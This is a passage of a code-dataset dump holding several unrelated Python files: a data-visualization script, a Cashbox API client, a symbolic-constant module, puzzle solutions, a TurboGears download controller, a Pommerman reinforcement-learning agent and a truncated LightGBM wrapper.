数据可视化 **\n#\n# - 针对数值属性:\n#针对数值属性,绘制直方图,用qq图检验其分布是否为正态分布。绘制盒图,对离群值进行识别\n\n# 直方图\nfig = plt.figure(figsize = (20,11))\ni = 1\nfor item in frame2:\n ax = fig.add_subplot(3, 5, i)\n data[item].plot(kind = 'hist', title = item, ax = ax)\n i += 1\nplt.subplots_adjust(wspace = 0.3, hspace = 0.3)\nfig.savefig('./image1/histogram.png')\nprint('histogram saved at ./image1/histogram.png')\n\n#qq图\nfig = plt.figure(figsize = (20,11))\nax = qqplot(frame2, color=\"#00bb33\", xlabel=\"Expected p-value(-log10)\", ylabel=\"Observed p-value(-log10)\")\nplt.show()\n\n# - 绘制盒图,对离群值进行识别。\n# 盒图\nfig = plt.figure(figsize = (20,12))\ni = 1\nfor item in frame2:\n ax = fig.add_subplot(3, 5, i)\n data[item].plot(kind = 'box')\n i += 1\nfig.savefig('./image1/boxplot.png')\nprint('boxplot saved at ./image1/boxplot.png')\n\n# 处理缺失值\n#\n\n# 将缺失部分剔除\n# 绘制可视化图\nnan_list = pd.isnull(data).any(1).nonzero()[0]\nDataTable_filtrated = data;\nfig = plt.figure(figsize=(20, 15))\nn = 6\n# 对数值属性,绘制直方图\nfor i in frame2:\n ax = fig.add_subplot(3, 5, n)\n\n DataTable_filtrated[i] = DataTable_filtrated[i].dropna() # 删除\n ax.set_title(i)\n data[i].plot(ax=ax, alpha=0.5, kind='hist', label='origin', legend=True)\n DataTable_filtrated[i].plot(ax=ax, alpha=0.5, kind='hist', label='filtrated', legend=True)\n # pyplot.show()\n ax.axvline(data[i].mean(), color='r')\n ax.axvline(DataTable_filtrated[i].mean(), color='b')\n n += 1\nplt.subplots_adjust(wspace=0.3, hspace=0.3)\n# 保存图像和处理后数据\nfig.savefig('./image1/missing_data_delete.png')\nprint('filted_missing_data1 saved at ./image1/missing_data_delete.png')\n\n# 用最高频率值来填补缺失值\n# 绘制可视化图\nDataTable_filtrated = data;\nfig = plt.figure(figsize=(20, 15))\nn = 6\n# 对数值属性,绘制直方图\nfor i in frame2:\n ax = fig.add_subplot(4, 5, n)\n MostFrequentElement = data[i].value_counts().idxmax();\n\n DataTable_filtrated[i] = DataTable_filtrated[i].fillna(value=MostFrequentElement); # 众数填补缺失值\n ax.set_title(i)\n data[i].plot(ax=ax, alpha=0.5, kind='hist', label='origin', legend=True)\n DataTable_filtrated[i].plot(ax=ax, alpha=0.5, kind='hist', label='filtrated', legend=True)\n # pyplot.show()\n ax.axvline(data[i].mean(), color='r')\n ax.axvline(DataTable_filtrated[i].mean(), color='b')\n n += 1\nplt.subplots_adjust(wspace=0.3, hspace=0.3)\n# 保存图像和处理后数据\nfig.savefig('./image1/missing_data_most.png')\nprint('filted_missing_data1 saved at ./image1/missing_data_most.png')\n\n# 通过属性的相关关系来填补缺失值,插值法\n# 绘制可视化图\nDataTable_filtrated = data;\nfig = plt.figure(figsize=(20, 15))\nn = 6\n# 对数值属性,绘制直方图\nfor i in frame2:\n ax = fig.add_subplot(4, 5, n)\n\n DataTable_filtrated[i].interpolate(inplace=True) # 插值\n ax.set_title(i)\n data[i].plot(ax=ax, alpha=0.5, kind='hist', label='origin', legend=True)\n DataTable_filtrated[i].plot(ax=ax, alpha=0.5, kind='hist', label='filtrated', legend=True)\n # pyplot.show()\n ax.axvline(data[i].mean(), color='r')\n ax.axvline(DataTable_filtrated[i].mean(), color='b')\n n += 1\nplt.subplots_adjust(wspace=0.3, hspace=0.3)\n# 保存图像和处理后数据\nfig.savefig('./image1/missing_data_corelation.png')\nprint('filted_missing_data1 saved at ./image1/missing_data_corelation.png')\n\n\n","sub_path":"new1.py","file_name":"new1.py","file_ext":"py","file_size_in_byte":5444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"394876551","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport requests\nimport hmac\nimport hashlib\nimport base64\nimport datetime\nfrom time import sleep\n\ndef main():\n url = 'https://cashbox.ru/webapi/v1/user/account/balance'\n 
result = req(url)\n print('Денег на счете = ', result['balance'])\n url = 'https://cashbox.ru/webapi/v1/task/326354'\n result = req(url)\n print('Денег в задаче = ', result['publishing']['paidTimes'] - result['publishing']['resultsCount'])\n url = 'https://cashbox.ru/webapi/v1/freetask/326354/reports/2'\n result = req(url)\n i = 0\n for id in result:\n url_check = f'https://cashbox.ru/webapi/v1/freetaskreport/{id}/confirm'\n i += 1\n req(url_check)\n #print('Отчет подтвержден = ', url_check)\n print('Подтверждено = ', i)\n\n\ndef req(url):\n PublicKey = b''\n SecretKey = b''\n dt = str(int(datetime.datetime.now().timestamp())) + '000'\n #md5 = base64.b64encode(hashlib.md5(SecretKey).digest())\n plaintStr = f'{PublicKey.decode(\"utf-8\")}:GET:{url}:{dt}:'\n signature = base64.b64encode(\n hmac.new(SecretKey, plaintStr.encode('UTF-8'), hashlib.sha512).digest())\n h = {'Timestamp': dt,\n 'Authorization': f'CashboxAuth {PublicKey.decode(\"UTF-8\")}:{signature.decode(\"UTF-8\")}', 'Content-Type': 'application/json', 'Connection': 'close'}\n r = requests.get(url, headers=h)\n #print(r.text)\n sleep(1)\n if url.find('confirm') == -1:\n return(r.json())\n else:\n return(r.text)\n\n\nif __name__ == '__main__':\n main()\n\n# GET:\n#Timestamp: 1588925300544\n# Authorization: CashboxAuth 'ваш PublicKey':n3RDovb0Ft4iN8wo6MEjsldaI17q7HrdUBwzSyK7hRI/UpcVBEckW6qlnNZg48cbz+crst8BbROXnWCGJmkOOA==\n\n# POST:\n#Timestamp: 1588925365555\n# Authorization: CashboxAuth 'ваш PublicKey':O4t+V6/6c2gXlsUke7LF0N6OBgzF20I3v9J+59VBORDEz+hH/iYU+FMr4wyvBJjnVlufn8xuncArFT5hR31+og==\n# Content-Type: application/json\n","sub_path":"cashbox.py","file_name":"cashbox.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"86373375","text":"\"\"\"\r\nModulo para constantes arbitraria, para uso en calculos simbolicos\r\n\"\"\"\r\nimport math, cmath, typing, operator\r\nfrom abc import abstractmethod\r\nfrom fractions import Fraction\r\nfrom numbers import Number, Real, Complex, Rational\r\nfrom itertools import chain\r\nfrom collections import namedtuple\r\n\r\nPartes_de_Constante = namedtuple(\"Partes_de_Constante\",\"a m e C name\")\r\n\r\n\r\n__all__ =['ConstanteABC','ConstanteBase','sqrt','evaluar_constante','evaluar_formula']\r\n\r\nclass ConstanteABC(Number):\r\n '''Constante numerica arbitraria de forma: (a+mC**e) con a,m,e conocidos'''\r\n \r\n @property\r\n @abstractmethod\r\n def a(self):\r\n \"\"\"(a+mC**e) -> a\"\"\"\r\n raise NotImplementedError\r\n\r\n @property\r\n @abstractmethod\r\n def m(self):\r\n \"\"\"(a+mC**e) -> m\"\"\"\r\n raise NotImplementedError\r\n\r\n @property\r\n @abstractmethod\r\n def e(self):\r\n \"\"\"(a+mC**e) -> e\"\"\"\r\n raise NotImplementedError\r\n\r\n @property\r\n @abstractmethod\r\n def C(self):\r\n \"\"\"(a+mC**e) -> C\"\"\"\r\n raise NotImplementedError\r\n\r\n @property\r\n @abstractmethod\r\n def name(self):\r\n \"\"\"Nombre de esta constante\"\"\"\r\n raise NotImplementedError\r\n\r\n def partes(self):\r\n \"\"\"Regresa una tupla con las partes constitullentes de esta constante\"\"\"\r\n return Partes_de_Constante(a=self.a, m=self.m, e=self.e, C=self.C, name=self.name)\r\n\r\n def __call__(self,valor):\r\n return evaluar_constante(self,valor,self.name)\r\n\r\n def __repr__(self):\r\n a = ('a='+repr(self.a) ) if self.a else ''\r\n m = ('m='+repr(self.m) ) if self.m!=1 else ''\r\n e = ('e='+repr(self.e) ) if self.e!=1 else ''\r\n C = ('C='+repr(self.C) ) if self.C else ''\r\n return 
'{}({})'.format(self.__class__.__qualname__, ', '.join(chain([repr(self.name)],filter(None,(a,m,e,C)))) )\r\n\r\n def __str__(self):\r\n a,m,e,C,name = self.partes()\r\n add = str(a) if a else ''\r\n try:\r\n sig = '+' if m>=0 else ''\r\n except TypeError:\r\n sig = '+'\r\n con = ( str(m if m!=-1 else '-') if m!=1 else '' ) + (name if not C else str(C))\r\n exp = str(e) if e != 1 else ''\r\n if exp and exp.startswith(\"-\"):\r\n exp = '({exp})'.format(exp=exp)\r\n resul=''\r\n if add:\r\n resul += add + ' ' + sig\r\n resul += con\r\n if exp:\r\n resul += '**'+exp\r\n return '({resul})'.format(resul=resul)\r\n \r\n def __lt__(self,otro):\r\n \"\"\"C a\"\"\"\r\n return self._a\r\n\r\n @property\r\n def m(self):\r\n \"\"\"(a+mC**e) -> m\"\"\"\r\n return self._m\r\n\r\n @property\r\n def e(self):\r\n \"\"\"(a+mC**e) -> e\"\"\"\r\n return self._e\r\n\r\n @property\r\n def C(self):\r\n \"\"\"(a+mC**e) -> C\"\"\"\r\n return self._c\r\n\r\n @property\r\n def name(self):\r\n \"\"\"Nombre de esta constante\"\"\"\r\n return self._name\r\n\r\ndef rational_div_maker(div):\r\n def rational_div(a,b):\r\n \"\"\"Si ambos argumentos son Racionales, entonces regresa Fraction(a,b)\r\n sino regresa div(a,b)\"\"\"\r\n if isinstance(a,Rational) and isinstance(b,Rational):\r\n return Fraction(a,b)\r\n return div(a,b)\r\n return rational_div\r\n\r\ndef sqrt(x:typing.Union[Real,Complex,ConstanteABC], _fraction_resul=False) -> typing.Union[Real,Complex,ConstanteABC]:\r\n \"\"\"Calcula la raiz cuadrada de x, segun el valor de x\r\n retornando un número complejo o una Constante de ser necesario\r\n\r\n _fraction_resul si es True y x es una fraccion no negativa, entoces el\r\n resultado sera una fraccion\"\"\"\r\n if isinstance(x,ConstanteABC):\r\n return x**Fraction(1,2)\r\n try:\r\n if _fraction_resul and x>=0 and isinstance(x,Fraction):\r\n n = Fraction( *(sqrt(x.numerator).as_integer_ratio() ) )\r\n d = Fraction( *(sqrt(x.denominator).as_integer_ratio() ) )\r\n return n/d\r\n return math.sqrt(x) if x>=0 else cmath.sqrt(x)\r\n except TypeError:\r\n return cmath.sqrt(x)\r\n\r\ndef evaluar_constante(cons:ConstanteABC,valor:Number,name:str=None) -> typing.Union[Number, ConstanteABC]:\r\n \"\"\"Evalua el valor de la formula de la constante dada con el valor\r\n otorgado para la constante del nombre dado, que en caso de ser\r\n omitido sera cons.name\"\"\"\r\n if not isinstance(cons, ConstanteABC):\r\n return cons\r\n if name is None:\r\n return evaluar_constante(cons,valor,cons.name)\r\n if cons.C:\r\n c = evaluar_constante(cons.C,valor,name)\r\n else:\r\n c = valor if cons.name == name else cons.__class__(cons.name)\r\n a = evaluar_constante(cons.a,valor,name)\r\n m = evaluar_constante(cons.m,valor,name)\r\n e = evaluar_constante(cons.e,valor,name)\r\n if e == 0.5:\r\n return sqrt(c)*m + a\r\n return m*c**e + a \r\n\r\ndef evaluar_formula(formula:ConstanteABC,*valores:[(\"nombre\",\"valor\")]) -> typing.Union[Number, ConstanteABC]:\r\n \"\"\"Evalua la formula contenida en la constante dada.\"\"\"\r\n resul = formula\r\n for c,v in valores:\r\n resul = evaluar_constante(resul,v,c)\r\n return resul\r\n\r\n","sub_path":"constanteclass.py","file_name":"constanteclass.py","file_ext":"py","file_size_in_byte":9178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"446366477","text":"infile = open(\"day3.txt\",\"r\")\ninfile2 = open(\"day3.txt\",\"r\")\ncoordDict = {}\n\ndef lineFormat(line):\n tempList = line.split(\" \")\n startX,startY = tempList[2].split(\",\") #lots of 
string formating...\n startY = startY.replace(\":\",\"\")\n startX = 1 + int(startX)\n startY = 1 + int(startY)\n factorX, factorY = tempList[3].split(\"x\")\n return startX, startY, factorX, factorY\n\n\nfor line in infile:\n startX, startY, factorX, factorY = lineFormat(line)\n\n for x in range(startX,int(factorX)+startX): #goes through a range from (the start of x) to (the length of x + the start of x)\n for y in range(startY,int(factorY)+startY):\n z = str(x) + \":\" + str(y)\n if z not in coordDict:\n coordDict[z] = 1\n\n else:\n coordDict[z] += 1\n\n# for key,value in coordDict.items():\n# if(value > 1):\n# dubbedClaims += 1\n\nfor line in infile2:\n isAnswer = True\n startX, startY, factorX, factorY = lineFormat(line)\n\n for x in range(startX,int(factorX)+startX): #goes through a range from (the start of x) to (the length of x + the start of x)\n for y in range(startY,int(factorY)+startY):\n z = str(x) + \":\" + str(y)\n if coordDict[z] != 1:\n isAnswer = False\n '''\n as the program loops through the file, a boolean starts out as true and then becomes false if\n the line's claims hit a claim that has a dictionary value that is not 1. If all the dictionary\n values of the line's claims are 1, then the isAnswer remains true for the if statement below.\n '''\n if(isAnswer):\n print(\"ANSWER: \" + line)\n","sub_path":"Advent of Code 2018/day3/day3p2.py","file_name":"day3p2.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"288098990","text":"# @author: Gunnar Schaefer\n\nfrom tg import config, expose, flash, redirect, request, response\nfrom tg.i18n import ugettext as _, lazy_ugettext as l_\nfrom repoze.what import predicates\n\nimport os\nimport time\nimport shlex\nimport subprocess\nfrom collections import OrderedDict\n\nimport nimsutil\nfrom nimsgears import model\nfrom nimsgears.model import *\n\nfrom nimsgears.lib.base import BaseController\nfrom nimsgears.controllers.access import AccessController\nfrom nimsgears.controllers.browse import BrowseController\nfrom nimsgears.controllers.search import SearchController\nfrom nimsgears.controllers.groups import GroupsController\n\nimport json\n\n__all__ = ['AuthController']\n\n\nclass AuthController(BaseController):\n\n access = AccessController()\n browse = BrowseController()\n search = SearchController()\n groups = GroupsController()\n\n allow_only = predicates.not_anonymous(msg=l_('You must be logged in to view this page.'))\n\n # FIXME: handle deactivated users\n #active_user = predicates.in_group('users', msg=l_('Your account is inactive. 
You can request activation below.'))\n\n def _not_active_user(msg):\n flash(msg)\n redirect('/auth/activate')\n\n @expose()\n def index(self):\n redirect('/auth/status')\n\n @expose('nimsgears.templates.activate')\n def activate(self, **kwargs):\n return self.prefs()\n\n @expose('nimsgears.templates.toggle_admin')\n def toggle_admin(self, came_from):\n user = request.identity['user']\n DBSession.add(user)\n user.admin_mode = not user.admin_mode\n redirect(came_from)\n\n @expose('nimsgears.templates.prefs')\n def prefs(self, **kwargs):\n user = request.identity['user']\n\n if kwargs:\n DBSession.add(user)\n for key, value in kwargs.iteritems():\n setattr(user, key, value)\n flash(l_('Your settings have been updated.'))\n\n if not user.firstname or not user.lastname or not user.email:\n ldap_firstname, ldap_lastname, ldap_email = nimsutil.ldap_query(user.uid)\n firstname = user.firstname or ldap_firstname\n lastname = user.lastname or ldap_lastname\n email = user.email or ldap_email\n\n prefs = OrderedDict()\n prefs['firstname'] = ('First Name', firstname)\n prefs['lastname'] = ('Last Name', lastname)\n prefs['email'] = ('Email Address', email)\n\n return dict(page='prefs', prefs=prefs)\n\n @expose('nimsgears.templates.status')\n def status(self):\n #if not predicates.in_group('active_users').is_met(request.environ):\n # flash(l_('Your account is not yet active.'))\n # redirect('/auth/prefs')\n\n failed_jobs = Job.query.filter(Job.status == u'failed').all()\n active_jobs = Job.query.filter(Job.status == u'active').all()\n new_jobs = Job.query.filter(Job.status == u'new').all()\n return dict(\n page='status',\n failed_jobs=failed_jobs,\n active_jobs=active_jobs,\n new_jobs=new_jobs,\n )\n\n @expose('nimsgears.templates.admin')\n def admin(self):\n return dict(page='admin', params={})\n\n @expose(content_type='image/png')\n def image(self, *args):\n return open('/tmp/image.png', 'r')\n\n @expose(content_type='application/octet-stream')\n def speed(self, *args):\n #return open('/boot/kernel/kernel.symbols', 'r')\n return subprocess.Popen(shlex.split('tar -cLf - %s' % '/boot/kernel/kernel.symbols'), stdout=subprocess.PIPE, cwd='/tmp').stdout\n\n @expose(content_type='application/x-tar')\n def download(self, **kwargs):\n user = request.identity['user']\n user_path = '%s/%s' % (config.get('links_path'), 'superuser' if user.is_superuser else user.uid)\n tar_dirs = None\n if 'id_dict' in kwargs and 'sess' in kwargs['id_dict']:\n query_type = Session\n id_list = [int(id) for id in json.loads(kwargs['id_dict'])['sess']]\n db_res = (DBSession.query(Session, Experiment, ResearchGroup, Dataset, Epoch)\n .join(Subject, Session.subject)\n .join(Experiment, Subject.experiment)\n .join(ResearchGroup, Experiment.owner)\n .join(Epoch, Session.epochs)\n .join(Dataset, Epoch.datasets)\n .filter((Dataset.kind == u'secondary') | (Dataset.kind == u'derived'))\n .filter(Session.id.in_(id_list))\n .all())\n tar_dirs = ['%s/%s/%s/%s/%s' % (r.ResearchGroup.gid, r.Experiment.name, r.Session.name, r.Epoch.name, r.Dataset.name) for r in db_res]\n elif 'id_dict' in kwargs and 'dataset' in kwargs['id_dict']:\n query_type = Dataset\n id_list = [int(id) for id in json.loads(kwargs['id_dict'])['dataset']]\n db_res = (DBSession.query(Dataset, Epoch, Session, Experiment, ResearchGroup)\n .join(Epoch, Dataset.container)\n .join(Session, Epoch.session)\n .join(Subject, Session.subject)\n .join(Experiment, Subject.experiment)\n .join(ResearchGroup, Experiment.owner)\n .filter(Dataset.id.in_(id_list))\n .all())\n tar_dirs = 
['%s/%s/%s/%s/%s' % (r.ResearchGroup.gid, r.Experiment.name, r.Session.name, r.Epoch.name, r.Dataset.name) for r in db_res]\n if tar_dirs:\n #redirect('/%s/download.php?%s' % (user_path, '&'.join('dirs[%d]=%s' %(i, p) for i, p in enumerate(tar_dirs))))\n tar_proc = subprocess.Popen(shlex.split('tar -cLf - -C %s %s' % (user_path, ' '.join(tar_dirs))), stdout=subprocess.PIPE)\n response.headerlist.append(('Content-Disposition', 'attachment; filename=%s_%d' % ('nims', time.time())))\n return tar_proc.stdout\n","sub_path":"nimsgears/controllers/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":5872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"480604922","text":"from pommerman.agents import BaseAgent\nimport numpy as np\nimport torch\n\nfrom pommerman import constants\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom pommerman.agents import dqn_agent_utilities as filter\nfrom pommerman.agents import filter_action # Chao's rules\n\n# provide input channels\n\nN_S = None\nN_A = None\n\nCENTRALIZED_CRITIC = True\nFILTER_RULES = True\n\ndef v_wrap(np_array, dtype=np.float32):\n if np_array.dtype != dtype:\n np_array = np_array.astype(dtype)\n return torch.from_numpy(np_array)\n\nclass Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n board_size = 11\n self.distribution = torch.distributions.Categorical\n self.a_dim = 6\n\n self.cnn_last_dim = 32\n self.post_cnn_layer_dim = 128\n\n self.lin_input = self.cnn_last_dim * board_size * board_size\n\n # Add LSTMCell here - see how the hidden state will be reset each turn\n # if LSTM_ENABLED:\n # self.lstm = nn.LSTMCell(self.lin_input, self.post_cnn_layer_dim)\n # else:\n # self.post_cnn_layer = nn.Linear(self.lin_input, self.post_cnn_layer_dim )\n # set_init([self.post_cnn_layer])\n\n if CENTRALIZED_CRITIC: # TODO an LSTM can fit into this ....\n self.c_critic_conv1 = nn.Conv2d(20, 32, kernel_size=3, stride=1, padding=1) # TODO team single critic observation has 20 channels\n self.c_critic_conv2 = nn.Conv2d(32, 32, kernel_size=3, stride=1, padding=1)\n self.c_critic_conv3 = nn.Conv2d(32, 32, kernel_size=3, stride=1, padding=1)\n self.c_critic_conv4 = nn.Conv2d(32, self.cnn_last_dim, kernel_size=3, stride=1, padding=1)\n self.c_critic_ln1 = nn.Linear(self.lin_input, self.post_cnn_layer_dim)\n self.c_critic_ln2 = nn.Linear(self.post_cnn_layer_dim, self.post_cnn_layer_dim)\n self.c_critic_ln3 = nn.Linear(self.post_cnn_layer_dim, self.post_cnn_layer_dim)\n self.c_critic_head = nn.Linear(self.post_cnn_layer_dim, 1)\n\n self.conv1 = nn.Conv2d(19, 32, kernel_size=3, stride=1, padding=1)\n self.conv2 = nn.Conv2d(32, 32, kernel_size=3, stride=1, padding=1)\n self.conv3 = nn.Conv2d(32, 32, kernel_size=3, stride=1, padding=1)\n self.conv4 = nn.Conv2d(32, self.cnn_last_dim, kernel_size=3, stride=1, padding=1)\n\n # Branch 1 for the first trained agent\n self.agent1_ln1 = nn.Linear(self.lin_input, self.post_cnn_layer_dim)\n self.agent1_ln2 = nn.Linear(self.post_cnn_layer_dim, self.post_cnn_layer_dim)\n self.agent1_ln3 = nn.Linear(self.post_cnn_layer_dim, self.post_cnn_layer_dim)\n self.agent1_head_actor = nn.Linear(self.post_cnn_layer_dim,self.a_dim)\n self.agent1_head_critic = nn.Linear(self.post_cnn_layer_dim,1)\n\n # Branch 2 for the second trained agent\n self.agent2_ln1 = nn.Linear(self.lin_input, self.post_cnn_layer_dim)\n self.agent2_ln2 = nn.Linear(self.post_cnn_layer_dim, self.post_cnn_layer_dim)\n self.agent2_ln3 = nn.Linear(self.post_cnn_layer_dim, 
self.post_cnn_layer_dim)\n self.agent2_head_actor = nn.Linear(self.post_cnn_layer_dim, self.a_dim)\n self.agent2_head_critic = nn.Linear(self.post_cnn_layer_dim, 1)\n\n def forward(self, x, agent_index=None, hx=None, cx=None): # pass agent id here to diverge on the branch - also pass ffa ...\n #TODO first teammate index can be 0 or 1 - second teammate index can be 2 or 3\n\n #print(f\" size of hx is {hx.shape}\")\n\n if CENTRALIZED_CRITIC and agent_index is None: # return centralized critic based on fully observable state information\n #print('passing here')\n y = F.elu(self.c_critic_conv1(x)) # TODO input here will be ffa state\n y = F.elu(self.c_critic_conv2(y))\n y = F.elu(self.c_critic_conv3(y))\n y = F.elu(self.c_critic_conv4(y))\n\n y = y.view(-1, self.lin_input) # to fix the shape before fully connected layer\n\n y = F.elu(self.c_critic_ln1(y))\n y = F.elu(self.c_critic_ln2(y))\n y = F.elu(self.c_critic_ln3(y))\n return self.c_critic_head(y) # return a single central value estimate ...\n\n x = F.elu(self.conv1(x))\n x = F.elu(self.conv2(x))\n x = F.elu(self.conv3(x))\n x = F.elu(self.conv4(x))\n\n x = x.view(-1, self.lin_input) # to fix the shape before fully connected layer\n\n # if LSTM_ENABLED:\n # hx, cx = self.lstm(x, (hx,cx))\n # x = hx\n # else:\n # x = F.elu(self.post_cnn_layer(x))\n\n if agent_index in (0,1): # return first agent actor and LOCAL critic\n x = F.elu(self.agent1_ln1(x))\n x = F.elu(self.agent1_ln2(x))\n x = F.elu(self.agent1_ln3(x))\n agent1_logits = self.agent1_head_actor(x)\n agent1_values = self.agent1_head_critic(x)\n return agent1_logits, agent1_values, hx,cx\n else: # return second agent actor and LOCAL critic\n x = F.elu(self.agent2_ln1(x))\n x = F.elu(self.agent2_ln2(x))\n x = F.elu(self.agent2_ln3(x))\n agent2_logits = self.agent2_head_actor(x)\n agent2_values = self.agent2_head_critic(x)\n return agent2_logits, agent2_values, hx, cx\n\n def choose_action(self, s, agent_index, hx=None, cx=None, value_viz_buffer=None, policy_viz_buffer=None):\n #print(s)\n # print(f\"set to eval {s.shape}\")\n self.eval() # to freeze weights\n logits, value, hx, cx = self.forward(s, agent_index, hx, cx)\n\n prob = F.softmax(logits, dim=1).data\n #prob_np = prob.data.numpy()\n #print(f\"probs are {prob_np}\")\n #print(f\"probs are {prob_np[0][0]}\")\n\n if value_viz_buffer is not None: # TODO these parts have been added to log game data for visualization\n value_viz_buffer.append((value.data.numpy().flatten()))\n if policy_viz_buffer is not None:\n policy_viz_buffer.append((prob.data.numpy().flatten()))\n\n m = self.distribution(prob)\n\n #print(f\"state value is {value}\")\n\n return m.sample().numpy()[0], hx, cx, prob.data.numpy()[0] # also return probs\n\n\nclass bilal_ccritic_bignn_Alt_Agent(BaseAgent):\n\n def __init__(self, *args, **kwargs):\n super(bilal_ccritic_bignn_Alt_Agent, self).__init__(*args, **kwargs)\n self.gnet = Net()\n self.gnet.load_state_dict(torch.load('bilal_ccritic_bignn40K.pt'))\n self.game_step = 0\n\n def correct_nn_with_rules(self, obs, nn_intended_action, nn_probs):\n safe_actions = filter_action.get_filtered_actions(obs)\n if nn_intended_action not in safe_actions:\n nn_probs[np.setdiff1d([0, 1, 2, 3, 4, 5], safe_actions)] = 0.00000000000000000001 # added this due to 'fewer non-zero with p> 0 than size error'\n new_action = np.random.choice(6,1,replace=False,p=nn_probs/(sum(nn_probs)))\n if new_action is None:\n print(\"ERROR BY NONE Action\")\n return new_action\n else:\n return nn_intended_action\n\n def act(self, obs, action_space):\n\n 
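# Note: derive this agent's id from the board at its current position, build the network input with generate_NN_input_with_ids, then pick an action (optionally filtered by the safety rules).\n        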
our_agent_pos = np.array(obs['position'])\n        current_board = np.array(obs['board']) # done\n        #print('agent pos', our_agent_pos[0])\n        #print('agent pos', our_agent_pos[1])\n\n        our_agent_id = int(current_board[our_agent_pos[0]][our_agent_pos[1]])#\n        #print('our agent id is ', our_agent_id)\n\n        tm_filtered_state = v_wrap(filter.generate_NN_input_with_ids(our_agent_id, obs, self.game_step)).unsqueeze(0) # TODO passed 10 as agent id - fix that ...\n        tm_nn_action, _, _, NN_probs = self.gnet.choose_action(tm_filtered_state, our_agent_id-10) # overload the first action\n        if FILTER_RULES:\n            tm_nn_action = self.correct_nn_with_rules(obs, tm_nn_action, NN_probs)\n\n        self.game_step = self.game_step + 1\n\n        return int(tm_nn_action)\n\n\n    def episode_end(self, reward):\n        self.game_step = 0\n","sub_path":"pommerman/agents/bilal_ccritic_bignn_alt.py","file_name":"bilal_ccritic_bignn_alt.py","file_ext":"py","file_size_in_byte":8051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"400204031","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\n@author: AC4Fun\n@license: huifangshuyuan.com\n@contact: ximuzmzj@gmail.com\n@file: 15. 3Sum.py\n@time: 2022-01-09 11:08\n@desc: doc\nGiven an integer array nums, return all the triplets [nums[i], nums[j], nums[k]] such that i != j, i != k, and j != k, and nums[i] + nums[j] + nums[k] == 0.\n\nNotice that the solution set must not contain duplicate triplets.\n\n\n\nExample 1:\n\nInput: nums = [-1,0,1,2,-1,-4]\nOutput: [[-1,-1,2],[-1,0,1]]\nExample 2:\n\nInput: nums = []\nOutput: []\nExample 3:\n\nInput: nums = [0]\nOutput: []\n\n\nConstraints:\n\n0 <= nums.length <= 3000\n-10^5 <= nums[i] <= 10^5\n\"\"\"\n\n\nclass Solution:\n    def threeSum(self, nums: List[int]) -> List[List[int]]:\n        n = len(nums)\n        nums.sort()\n        result = []\n        for i in range(n):\n            # skip values equal to the one seen in the previous iteration (avoids duplicate triplets)\n            if i > 0 and nums[i] == nums[i - 1]:\n                continue\n            k = n - 1\n            target = -nums[i]\n            for j in range(i + 1, n):\n                # print(\"i,j,k, result\", i, j, k, result)\n                # skip values equal to the one seen in the previous iteration (avoids duplicate triplets)\n                if j > i + 1 and nums[j - 1] == nums[j]:\n                    continue\n                while k > j and nums[j] + nums[k] > target:\n                    k = k - 1\n                if j == k:\n                    break\n                if nums[j] + nums[k] == target:\n                    result.append([nums[i], nums[j], nums[k]])\n        return result\n\n\n\n\n","sub_path":"leetcode/15. 3Sum.py","file_name":"15. 3Sum.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"95878927","text":"import numpy as np\nimport lightgbm as lgb\nimport xgboost as xgb\nfrom sklearn.metrics import mean_squared_error, roc_auc_score\n\n\nclass Model:\n    def __init__(self, params, num_boost, early_stopping_rounds, verbose):\n        self.params = params\n        self.num_boost = num_boost\n        self.early_stopping_rounds = early_stopping_rounds\n        self.verbose = verbose\n\n\nclass Lightgbm(Model):\n    def __init__(self, params, num_boost, early_stopping_rounds, verbose):\n        super().__init__(params, num_boost, early_stopping_rounds, verbose)\n\n    def classifier(self, multi_class=False):\n        self.model = lgb.LGBMClassifier(**self.params)\n        if \"metric\" not in self.params.keys():\n            if multi_class is False:\n                self.params[\"metric\"] = \"auc\"\n            else:\n                self.params[\"metric\"] = \"multi_logloss\"\n\n    def regressor(self):\n        self.model = lgb.LGBMRegressor(**self.params)\n        if \"metric\" in self.params.keys():\n            self.params[\"metric\"] = \"rmse\"\n\n    def fit(self, X_train, y_train, X_val, y_val):\n        self.model.fit(\n            X_train,\n            y_train,\n            eval_set=[(X_val, y_val)],\n            eval_metric=self.params[\"metric\"],\n            early_stopping_rounds=self.early_stopping_rounds,\n            verbose=self.verbose,\n        )\n\n    # `.predict()` means `.predict_proba()`\n    def predict(self, X_val, X_test, multi_class=False):\n        assert (\n            type(self.model) is lgb.sklearn.LGBMClassifier\n            or type(self.model) is lgb.sklearn.LGBMRegressor\n        ), print(\n            \"model should be lightgbm.sklearn.LGBMClassifier or lightgbm.sklearn.LGBMRegressor\"\n        )\n\n        if type(self.model) is lgb.sklearn.LGBMClassifier:\n            if multi_class is False:\n                self.y_pred_val = self.model.predict_proba(X_val)[:, 1]\n                self.y_pred_test = self.model.predict_proba(X_test)[:, 1]\n            else:\n                self.y_pred_val = np.argmax(self.model.predict_proba(X_val), axis=1)\n                self.y_pred_test = np.argmax(self.model.predict_proba(X_test), axis=1)\n        elif type(self.model) is lgb.sklearn.LGBMRegressor:\n            self.y_pred_val = self.model.predict(X_val)\n            self.y_pred_test = self.model.predict(X_test)\n        return self.y_pred_val, self.y_pred_test\n\n    def evaluate(self, y_val, y_pred_val, multi_class=False):\n        assert (\n            type(self.model) is lgb.sklearn.LGBMClassifier\n            or type(self.model) is lgb.sklearn.LGBMRegressor\n        ), print(\n            \"model should be lightgbm.sklearn.LGBMClassifier or lightgbm.sklearn.LGBMRegressor\"\n        )\n        if 